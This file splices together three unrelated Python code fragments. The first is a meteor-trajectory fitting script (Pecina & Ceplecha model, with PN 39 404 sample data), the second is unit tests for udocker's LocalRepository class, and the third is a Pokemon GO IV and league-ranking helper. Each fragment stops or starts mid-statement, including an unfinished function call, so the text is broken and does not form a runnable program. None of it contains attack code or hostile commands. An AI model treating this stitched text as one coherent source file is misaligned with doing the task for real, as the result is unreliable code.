htFromLen(l0, c, zr) # # Compute the velocity from height and model parameters # ht_arr = ht_dens_arr = np.linspace(1000*np.min(ht_data), 1000*np.max(ht_data), 100) # vel_arr = 1000*velFromHt(ht_arr/1000, h0, v0, v_inf, sigma, c, zr, dens_interp) # # Plot velocity observations vs fit # plt.scatter(vel_data[vel_data > 0], ht_data[vel_data > 0]) # plt.plot(vel_arr/1000, ht_arr/1000) # plt.xlabel("Velocity (km/s)") # plt.ylabel("Height (km)") # plt.show() # # Compute the time from height and model parameters # len_arr = np.linspace(np.min(len_data), np.max(len_data), 100) # time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # # Plot time vs length observations vs fit # plt.scatter(time_data, len_data) # plt.plot(time_arr, len_arr) # plt.xlabel("Time (s)") # plt.ylabel("Length (km)") # plt.show() # # Plot fit residuals # time_residuals = time_data - timeFromLen(len_data, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # plt.scatter(len_data, time_residuals) # # Plot the zero line # plt.plot(len_arr, np.zeros_like(len_arr), c='k', linestyle='dashed') # plt.xlabel("Length (km)") # plt.ylabel("Time residuals (s)") # max_res = 1.2*np.max(np.abs(time_residuals)) # plt.ylim(-max_res, max_res) # plt.show() # sys.exit() ### BELOW IS THE EXAMPLE FOR THE ORIGINAL PAPER ### # Location data for the PN example event (rough) lat = np.radians(50) lon = np.radians(-107) jd = 2444239.50000 # Example data from Pecina & Ceplecha (1983) for PN 39 404 pn_data = np.array([ # t(s),h (km),l (km) [0.00,79.174,0.000], [0.05,78.581,0.714], [0.10,77.904,1.530], [0.15,77.311,2.246], [0.25,76.015,3.808], [0.30,75.384,4.569], [0.40,74.111,6.102], [0.45,73.461,6.886], [0.50,72.837,7.639], [0.55,72.195,8.413], [0.60,71.556,9.183], [0.65,70.909,9.964], [0.70,70.269,10.735], [0.75,69.646,11.487], [0.90,67.750,13.773], [1.00,66.482,15.303], [1.05,65.852,16.062], [1.10,65.229,16.814], [1.15,64.596,17.578], [1.20,63.960,18.345], [1.25,63.338,19.096], [1.30,62.694,19.873], 
[1.35,62.086,20.606], [1.40,61.449,21.376], [1.45,60.829,22.123], [1.55,59.558,23.657], [1.60,58.949,24.392], [1.70,57.685,25.918], [1.75,57.055,26.679], [1.80,56.424,27.440], [1.85,55.795,28.199], [1.90,55.187,28.933], [1.95,54.576,29.671], [2.00,53.995,30.372], [2.05,53.340,31.163], [2.20,51.410,33.493], [2.30,50.191,34.966], [2.35,49.563,35.724], [2.40,48.892,36.534], [2.45,48.294,37.257], [2.50,47.682,37.996], [2.55,47.107,38.691], [2.60,46.500,39.424], [2.65,45.900,40.148], [2.70,45.289,40.887], [2.75,44.713,41.583], [2.85,43.532,43.010], [2.90,42.907,43.765], [2.95,42.363,44.422], [3.05,41.144,45.895], [3.10,40.581,46.575], [3.15,40.001,47.276], [3.20,39.478,47.909], [3.25,38.925,48.577], [3.30,38.369,49.249], [3.35,37.851,49.875], [3.50,36.290,51.762], [3.60,35.301,52.957], [3.65,34.825,53.533], [3.70,34.330,54.128], [3.75,33.915,54.633], [3.80,33.430,55.220], [3.85,32.993,55.743], [3.90,32.592,56.233], [3.95,32.184,56.727], [4.00,31.798,57.193], [4.05,31.436,57.631], [4.15,30.765,58.443], [4.20,30.442,58.832], [4.25,30.134,59.205], [4.35,29.565,59.894], [4.40,29.314,60.198], [4.45,29.049,60.517], [4.50,28.807,60.810], [4.55,28.567,61.101], [4.60,28.347,61.367] ]) # Extract the example PN data time_data, ht_data, len_data = pn_data.T # Compute the point-to-point velocity len_diff = len_data[1:] - len_data[:-1] time_diff = time_data[1:] - time_data[:-1] vel_data = len_diff/time_diff # Fit the Pecina & Ceplecha (1984) model to observations t0, l0, v0, v_inf, sigma, c, zr, dens_interp = fitPecinaCeplecha84Model(lat, lon, jd, time_data, ht_data, len_data) # Compute the h0 limit h0 = htFromLen(l0, c, zr) # Compute the velocity from height and model parameters ht_arr = ht_dens_arr = np.linspace(1000*np.min(ht_data), 1000*np.max(ht_data), 100) vel_arr = 1000*velFromHt(ht_arr/1000, h0, v0, v_inf, sigma, c, zr, dens_interp) # Plot velocity observations vs fit plt.scatter(vel_data, ht_data[1:]) plt.plot(vel_arr/1000, ht_arr/1000) plt.xlabel("Velocity (km/s)") 
plt.ylabel("Height (km)") plt.show() # Compute the time from height and model parameters len_arr = np.linspace(np.min(len_data), np.max(len_data), 100) time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # Plot time vs length observations vs fit plt.scatter(time_data, len_data) plt.plot(time_arr, len_arr) plt.xlabel("Time (s)") plt.ylabel("Length (km)") plt.show() sys.exit() ### BELOW IS THE CHECK OF THE FUNCTIONS ON THE ORIGINAL VALUES FROM THE PAPER ### ### FIT THE AIR DENSITY MODEL ### # Fit a 7th order polynomial to the air mass density from NRL-MSISE from the ceiling height to 3 km below # the fireball - limit the height to 12 km ht_min = np.min(ht_data) - 3 if ht_min < 12: ht_min = 12 # Compute the poly fit print("Fitting atmosphere polynomial...") dens_co = fitAtmPoly(lat, lon, 1000*ht_min, 1000*HT_CEILING, jd) # Create a convinience function for compute the density at the given height dens_interp = lambda h: atmDensPoly(h, dens_co) print(" ... done!") ### ### TEST EXAMPLE ### # PN v_inf = 15.3456 # km/s m_inf = 91.2 # kg sigma = 0.0308 # km^2/s^2 zr = np.radians(34.089) K = 1.0*1.2*650**(-2/3.0) # m^2/kg^(2/3) t0 = 3.5 # s l0 = 51.773 # km v0 = 12.281 # km/s # # Compute the velocity for every height using K # vel_arr = velFromHtPhysicalParams(ht_arr, 1000*v_inf, m_inf, sigma/1e6, zr, K, dens_interp) # # Plot observations vs fit # plt.scatter(ht_data[1:], vel_data) # plt.plot(ht_arr/1000, vel_arr/1000) # plt.show() # sys.exit() ### print("Finding height-length constant...") # Find the height-length constant and zenith angle p0 = [0, np.radians(45)] res = scipy.optimize.minimize(_lenFromHtResidual, p0, args=(ht_data, len_data)) # Extracted fitted parameters c, zr = res.x zr = np.abs(zr) print("c = {:.2f} km".format(c)) print("zr = {:.2f} deg".format(np.degrees(zr))) # Compute the h0 limit h0 = htFromLen(l0, c, zr) # Compute the velocity from height and model parameters ht_arr = ht_dens_arr = np.linspace(1000*ht_min, 
1000*np.max(ht_data), 100) vel_arr = 1000*velFromHt(ht_arr/1000, h0,
<reponame>kellrott/udocker #!/usr/bin/env python """ udocker unit tests: LocalRepository """ from unittest import TestCase, main from unittest.mock import patch, mock_open, call from udocker.container.localrepo import LocalRepository from udocker.config import Config BUILTIN = "builtins" BOPEN = BUILTIN + '.open' UDOCKER_TOPDIR = "/home/u1/.udocker" class LocalRepositoryTestCase(TestCase): """Management of local repository of container images and extracted containers """ def setUp(self): Config().getconf() Config().conf['topdir'] = UDOCKER_TOPDIR Config().conf['bindir'] = "" Config().conf['libdir'] = "" Config().conf['reposdir'] = "" Config().conf['layersdir'] = "" Config().conf['containersdir'] = "" Config().conf['homedir'] = "/home/u1" def tearDown(self): pass @patch('udocker.container.localrepo.FileUtil') def test_01_init(self, mock_fu): """Test01 LocalRepository() constructor.""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] lrepo = LocalRepository(UDOCKER_TOPDIR) self.assertTrue(lrepo.topdir) self.assertTrue(lrepo.reposdir) self.assertTrue(lrepo.layersdir) self.assertTrue(lrepo.containersdir) self.assertTrue(lrepo.bindir) self.assertTrue(lrepo.libdir) self.assertTrue(lrepo.homedir) self.assertEqual(lrepo.topdir, UDOCKER_TOPDIR) self.assertEqual(lrepo.cur_repodir, "") self.assertEqual(lrepo.cur_tagdir, "") self.assertEqual(lrepo.cur_containerdir, "") self.assertTrue(mock_fu.register_prefix.called_count, 3) @patch('udocker.container.localrepo.FileUtil') def test_02_setup(self, mock_fu): """Test02 LocalRepository().setup().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None, None, None, None] newdir = "/home/u2/.udocker" lrepo = LocalRepository(UDOCKER_TOPDIR) lrepo.setup(newdir) self.assertEqual(lrepo.topdir, newdir) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.os.makedirs') @patch('udocker.container.localrepo.FileUtil') def test_03_create_repo(self, mock_fu, mock_mkdir, 
mock_exists): """Test03 LocalRepository().create_repo().""" Config.conf['keystore'] = "tmp" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [False, False, False, False, False, False, False, False] mock_mkdir.side_effect = [None, None, None, None, None, None, None, None] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.create_repo() self.assertTrue(status) self.assertTrue(mock_exists.call_count, 8) self.assertTrue(mock_mkdir.call_count, 8) Config.conf['keystore'] = "tmp" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = OSError("fail") lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.create_repo() self.assertFalse(status) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_04_is_repo(self, mock_fu, mock_exists): """Test04 LocalRepository().is_repo().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [False, True, False, False, True] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_repo() self.assertTrue(mock_exists.call_count, 5) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.side_effect = [True, True, True, True, True] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_repo() self.assertTrue(mock_exists.call_count, 5) self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_05_is_container_id(self, mock_fu): """Test05 LocalRepository().is_container_id().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) 
self.assertTrue(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.is_container_id(contid) self.assertFalse(status) @patch.object(LocalRepository, '_protect') @patch('udocker.container.localrepo.FileUtil') def test_06_protect_container(self, mock_fu, mock_prot): """Test06 LocalRepository().protect_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_prot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.protect_container(contid) self.assertTrue(status) self.assertTrue(mock_prot.called) @patch.object(LocalRepository, '_unprotect') @patch('udocker.container.localrepo.FileUtil') def test_07_unprotect_container(self, mock_fu, mock_unprot): """Test07 LocalRepository().unprotect_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_unprot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.unprotect_container(contid) self.assertTrue(status) self.assertTrue(mock_unprot.called) @patch.object(LocalRepository, '_isprotected') @patch('udocker.container.localrepo.FileUtil') def test_08_isprotected_container(self, mock_fu, mock_isprot): """Test08 LocalRepository().isprotected_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contid = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_isprot.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.isprotected_container(contid) self.assertTrue(status) self.assertTrue(mock_isprot.called) @patch('udocker.container.localrepo.FileUtil') def test_09__protect(self, mock_fu): """Test09 LocalRepository()._protect().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" lrepo = LocalRepository(UDOCKER_TOPDIR) with 
patch(BOPEN, mock_open()): status = lrepo._protect(cdir) self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_10__unprotect(self, mock_fu): """Test10 LocalRepository()._unprotect().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._unprotect(cdir) self.assertTrue(status) self.assertTrue(mock_fu.return_value.remove.called) @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_11__isprotected(self, mock_fu, mock_exists): """Test11 LocalRepository()._isprotected().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cdir = "/home/u1/.udocker/contid" mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._isprotected(cdir) self.assertTrue(status) self.assertTrue(mock_exists.called) @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.os.access') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_12_iswriteable_container(self, mock_fu, mock_exists, mock_isdir, mock_access, mock_cdcont): """Test12 LocalRepository().iswriteable_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_exists.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 2) self.assertTrue(mock_exists.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) 
status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 3) self.assertTrue(mock_isdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = True mock_access.return_value = True mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 1) self.assertTrue(mock_access.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True mock_isdir.return_value = True mock_access.return_value = False mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.iswriteable_container(container_id) self.assertEqual(status, 0) @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.Uprocess.get_output') @patch('udocker.container.localrepo.FileUtil') def test_13_get_size(self, mock_fu, mock_getout, mock_cdcont): """Test13 LocalRepository().get_size().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_getout.return_value = "1234 dd" mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_size(container_id) self.assertEqual(status, 1234) self.assertTrue(mock_getout.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_getout.return_value = "" mock_cdcont.return_value = "/home/u1/.udocker/containerid" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_size(container_id) self.assertEqual(status, -1) @patch('udocker.container.localrepo.os.listdir') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.FileUtil') def test_14_get_containers_list(self, mock_fu, mock_isdir, 
mock_listdir): """Test14 LocalRepository().get_containers_list().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.return_value = False mock_listdir.return_value = list() cdir = "/home/u1/.udocker/containers" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertEqual(lrepo.containersdir, cdir) self.assertFalse(mock_listdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.return_value = True mock_listdir.return_value = list() cdir = "/home/u1/.udocker/containers" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertTrue(mock_listdir.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.side_effect = [True, False] cdir = "/home/u1/.udocker/containers" mock_listdir.return_value = [cdir] lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.get_containers_list() self.assertEqual(status, list()) self.assertTrue(mock_listdir.called) self.assertTrue(mock_isdir.call_count, 2) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_isdir.side_effect = [True, True] cdir = "/home/u1/.udocker/containers" mock_listdir.return_value = ["a"] lrepo = LocalRepository(UDOCKER_TOPDIR) with patch(BOPEN, mock_open()): status = lrepo.get_containers_list() self.assertEqual(status, [cdir + "/" + "a"]) self.assertTrue(mock_listdir.called) self.assertTrue(mock_isdir.call_count, 2) @patch.object(LocalRepository, 'del_container_name') @patch.object(LocalRepository, 'cd_container') @patch.object(LocalRepository, 'get_container_name') @patch.object(LocalRepository, 'get_containers_list') @patch('udocker.container.localrepo.FileUtil') def test_15_del_container(self, mock_fu, mock_getlist, mock_getname, mock_cdcont, mock_delname): """Test15 LocalRepository().del_container().""" mock_fu.return_value.register_prefix.side_effect = 
\ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" mock_cdcont.return_value = "" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_cdcont.return_value = contdir mock_getlist.return_value = [contdir] mock_delname.return_value = None mock_getname.return_value = ["mycont"] mock_fu.return_value.remove.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertFalse(status) self.assertTrue(mock_getlist.called) self.assertTrue(mock_delname.called) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_cdcont.return_value = contdir mock_getlist.return_value = [contdir] mock_delname.return_value = None mock_getname.return_value = ["mycont"] mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container(cont_id) self.assertTrue(status) self.assertTrue(mock_fu.return_value.remove.called) @patch.object(LocalRepository, 'get_containers_list') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_16_cd_container(self, mock_fu, mock_exists, mock_getlist): """Test16 LocalRepository().cd_container().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_getlist.return_value = [contdir] mock_exists.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.cd_container(cont_id) self.assertEqual(status, "") mock_fu.return_value.register_prefix.side_effect = \ 
[None, None, None] cont_id = "d2578feb-acfc-37e0-8561-47335f85e46a" cdirs = "/home/u1/.udocker/containers" contdir = cdirs + "/" + cont_id mock_getlist.return_value = [contdir] mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.cd_container(cont_id) self.assertEqual(status, contdir) @patch('udocker.container.localrepo.os.path.relpath') @patch('udocker.container.localrepo.os.symlink') @patch('udocker.container.localrepo.os.path.exists') @patch('udocker.container.localrepo.FileUtil') def test_17__symlink(self, mock_fu, mock_exists, mock_symlink, mock_relpath): """Test17 LocalRepository()._symlink().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._symlink("EXISTINGFILE", "LINKFILE") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_exists.return_value = False mock_symlink.return_value = None mock_relpath.return_value = "cont/ROOT" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._symlink("EXISTINGFILE", "LINKFILE") self.assertTrue(status) @patch('udocker.container.localrepo.FileUtil') def test_18__name_is_valid(self, mock_fu): """Test18 LocalRepository()._name_is_valid(). Check name alias validity. 
""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzskjghdlak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertTrue(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzskjghd/lak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = ".lzsklak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "]lzsklak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzs[klak" status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "lzs klak" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] name = "x" * 2049 lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo._name_is_valid(name) self.assertFalse(status) @patch('udocker.container.localrepo.os.path.exists') @patch.object(LocalRepository, '_symlink') @patch.object(LocalRepository, 'cd_container') @patch('udocker.container.localrepo.FileUtil') def test_18_set_container_name(self, mock_fu, mock_cd, mock_slink, mock_exists): """Test18 LocalRepository().set_container_name().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] container_id = "d2578feb-acfc-37e0-8561-47335f85e46a" lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "WRONG[/") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_cd.return_value = "CONTAINERDIR" 
mock_exists.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "RIGHT") self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] mock_cd.return_value = "CONTAINERDIR" mock_exists.return_value = False mock_slink.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.set_container_name(container_id, "RIGHT") self.assertTrue(status) @patch.object(LocalRepository, '_name_is_valid') @patch('udocker.container.localrepo.os.path.islink') @patch('udocker.container.localrepo.FileUtil') def test_19_del_container_name(self, mock_fu, mock_islink, mock_nameisvalid): """Test19 LocalRepository().del_container_name().""" mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contname = "mycont" mock_nameisvalid.return_value = False lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container_name(contname) self.assertFalse(status) mock_fu.return_value.register_prefix.side_effect = \ [None, None, None] contname = "mycont" mock_nameisvalid.return_value = True mock_islink.return_value = True mock_fu.return_value.remove.return_value = True lrepo = LocalRepository(UDOCKER_TOPDIR) status = lrepo.del_container_name(contname) self.assertTrue(status) @patch('udocker.container.localrepo.os.readlink') @patch('udocker.container.localrepo.os.path.isdir') @patch('udocker.container.localrepo.os.path.islink') @patch('udocker.container.localrepo.FileUtil') def test_20_get_container_id(self, mock_fu, mock_islink, mock_isdir, mock_readlink): """Test20 LocalRepository().get_container_id().""" mock_fu.return_value.register_prefix.side_effect = \ [None,
for s in self.ivs]) overwrite['ivs'] = new_ivs overwrite['form'] = 'Purified' overwrite['shadow'] = False # TODO: replace frustration with return new = self.copy(**overwrite) return new def family(self, ancestors=True, node=False, onlyadj=False): """ Get other members of this pokemon family Yields: Pokemon: other members of this family Ignore: self = Pokemon('gastly', ivs=[6, 13, 15]) self = Pokemon('haunter', ivs=[6, 13, 15]) self = Pokemon('gengar', ivs=[6, 13, 15]) list(self.family()) self = Pokemon('magikarp', ivs=[6, 13, 15]) list(self.family()) self = Pokemon('eevee', ivs=[6, 13, 15]) list(self.family(onlyadj=True)) self = Pokemon('ralts', ivs=[6, 13, 15], shadow=True) list(self.family(onlyadj=True)) list(self.family()) """ import networkx as nx blocklist = set() if not node: blocklist.add(self.name) if not ancestors: toadd = set(nx.ancestors(api.evo_graph, self.name)) blocklist.update(toadd) cc = api.name_to_family[self.name] if onlyadj: keeplist = set(api.evo_graph.adj[self.name]) blocklist = set(cc) - keeplist kw = { 'level': self.level, 'form': self.form, 'ivs': self.ivs, 'shadow': self.shadow, 'shiny': self.shiny, } for name in cc: if name not in blocklist: if name == self.name: other = Pokemon(name, cp=self.cp, **kw) else: other = Pokemon(name, **kw) yield other if other.shadow: yield other.purify() def populate_cp(self): level = self.level iva, ivd, ivs = self.ivs attack = self.info['base_attack'] + iva defense = self.info['base_defense'] + ivd stamina = self.info['base_stamina'] + ivs cp, adjusted = calc_cp(attack, defense, stamina, level) self.cp = cp self.adjusted = adjusted return cp, adjusted def check_evolution_cps(self, max_cp=1500, max_level=45): """ self = Pokemon('gastly', ivs=[6, 13, 15]) self.check_evolution_cps() self = Pokemon('gyarados', ivs=[6, 13, 15]) self.check_evolution_cps() self = Pokemon('magikarp', ivs=[6, 13, 15]) self.check_evolution_cps() """ import numpy as np evos = list(self.family(ancestors=False)) if len(evos) == 0: 
print('no evolutions available') for evo in evos: other = evo best_level = None for level in list(np.arange(1, max_level + 0.5, 0.5)): # TODO: could binary search other.level = level other.populate_cp() if other.cp <= max_cp: best_level = level else: break other.level = best_level other.populate_cp() print('To achieve other = {!r}'.format(other)) self.level = best_level cp, adjusted = self.populate_cp() print('self = {!r}'.format(self)) print('Pokemon CP must be less than this to be used in league') print('cp = {!r}'.format(cp)) def leage_rankings_for(self, have_ivs, max_cp=1500, max_level=45): """ Given a set of IVs for this pokemon compute the leage rankings """ leage_df = self.find_leage_rankings(max_cp=max_cp, max_level=max_level) leage_df = leage_df.set_index(['iva', 'ivd', 'ivs']) if abs(min(leage_df['cp'].max() - min(3000, max_cp), 0)) > 200: print('Out of this leage {}'.format(max_cp)) else: rows = [] for haves in have_ivs: # ultra_row = ultra_df.loc[haves] leage_row = leage_df.loc[haves] rows.append({ 'iva': haves[0], 'ivd': haves[1], 'ivs': haves[2], 'rank': leage_row['rank'], 'level': leage_row['level'], 'cp': leage_row['cp'], 'stat_product': leage_row['stat_product'], 'attack': leage_row['attack'], 'defense': leage_row['defense'], 'stamina': leage_row['stamina'], 'percent': leage_row['percent'], }) import pandas as pd rankings = pd.DataFrame.from_dict(rows) # print('') print('Leage {} Rankings'.format(max_cp)) print('self = {!r}'.format(self)) print(rankings.sort_values('rank')) def find_leage_rankings(self, max_cp=1500, max_level=45): """ Calculate the leage rankings for this pokemon's IVs, based on the adjusted stat product heuristic. 
Ignore: >>> import sys, ubelt >>> sys.path.append(ubelt.expandpath('~/misc/pkmn')) >>> from query_team_builder import * # NOQA >>> self = Pokemon('beedrill') >>> beedrill_df = self.find_leage_rankings(max_cp=1500) >>> # Find the best IVs that we have for PVP >>> self = Pokemon('empoleon') >>> have_ivs = [ >>> (0, 10, 14), >>> (1, 11, 5), >>> (1, 5, 7), >>> (1, 9, 13), >>> (2, 15, 13), >>> (2, 2, 10), >>> (2, 6, 9), >>> (3, 13, 11), >>> (3, 3, 2), >>> (4, 13, 13), >>> (5, 13, 14), >>> (4, 14, 14), >>> (7, 13, 3), >>> (13, 14, 14), >>> (15, 14, 14), >>> ] >>> self = Pokemon('beedrill') >>> have_ivs = [ >>> (0, 8, 14), >>> (0, 12, 14), >>> (1, 3, 10), >>> (1, 13, 6), >>> (4, 11, 13), >>> (4, 14, 13), >>> (1, 13, 7), >>> (1, 10, 8), >>> (4, 13, 13), >>> (4, 14, 14), >>> (4, 15, 12), >>> (5, 14, 11), >>> (11, 15, 14), >>> (15, 15, 15), >>> (12, 15, 15), >>> ] >>> self.leage_rankings_for(have_ivs) >>> have_ivs = [ >>> (4, 13, 10), >>> (5, 11, 14), >>> (4, 13, 11), >>> (6, 13, 15), >>> (7, 12, 13), >>> (7, 14, 14), >>> (7, 15, 15), >>> (7, 2, 9), >>> (10, 15, 11), >>> (15, 15, 15), >>> (7, 15, 15), >>> ] >>> self = Pokemon('gengar') >>> print('self.info = {}'.format(ub.repr2(self.info, nl=2))) >>> self.leage_rankings_for(have_ivs) >>> self = Pokemon('haunter') >>> print('self.info = {}'.format(ub.repr2(self.info, nl=2))) >>> self.leage_rankings_for(have_ivs) >>> have_ivs = [ >>> (12, 11, 14), >>> (12, 15, 15), >>> (15, 15, 15), >>> ] >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('blaziken').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (0, 2, 14), >>> (4, 2, 13), >>> (11, 13, 12), >>> (4, 13, 9), >>> (15, 12, 13), >>> (13, 14, 13), >>> (13, 14, 13), >>> (14, 14, 10), >>> (6, 15, 11), # purified >>> (13, 15, 14), # purified >>> ] >>> Pokemon('swampert').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('swampert').leage_rankings_for(have_ivs, 
